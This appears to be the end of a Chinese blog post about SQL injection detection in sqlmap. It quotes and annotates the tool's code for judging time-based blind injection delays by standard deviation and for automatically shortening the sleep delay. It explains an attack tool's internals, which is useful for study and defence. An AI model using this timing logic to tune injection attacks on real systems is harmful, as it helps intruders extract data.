if deviation:
# 需要一定数据量,统计结果才有意义
# MIN_TIME_RESPONSES = 10
if len(kb.responseTimes) < MIN_TIME_RESPONSES:
warnMsg = "time-based standard deviation method used on a model "
warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES
logger.warn(warnMsg)

# TIME_STDEV_COEFF = 10 必须大于等于7
lowerStdLimit = average(kb.responseTimes) + TIME_STDEV_COEFF * deviation
retVal = (threadData.lastQueryDuration >= lowerStdLimit)

# 如果retVal 为True, 发生Delay,需要调整
# TIME_DEFAULT_DELAY = 5, kb.testMode sql injection test mode,
# 用户没用手动更改Delay 时间
if not kb.testMode and retVal and conf.timeSec == TIME_DEFAULT_DELAY:
adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit)

return retVal
else:
return (threadData.lastQueryDuration - conf.timeSec) >= 0


# length of queue for candidates for time delay adjustment
TIME_DELAY_CANDIDATES = 3
kb.delayCandidates = TIME_DELAY_CANDIDATES * [0]
kb.delayCandidates = [0, 0, 0]


def adjustTimeDelay(lastQueryDuration, lowerStdLimit):
"""
Adjusts time delay in time-based data retrieval
"""

candidate = 1 + int(round((1 - (lastQueryDuration - lowerStdLimit) / lastQueryDuration) * conf.timeSec))

if candidate:
kb.delayCandidates = [candidate] + kb.delayCandidates[:-1]

if all([x == candidate for x in kb.delayCandidates]) and candidate < conf.timeSec:
print

warnMsg = "adjusting time delay to %d second%s " % (candidate, 's' if candidate > 1 else '')
warnMsg += "(due to good response times)"
logger.warn(warnMsg)

conf.timeSec = candidate


sqlmap 中的 SQL Injection 检测技术
https://usmacd.com/cn/sqlmap_sql_injection/
作者
henices
发布于
2017年7月7日
许可协议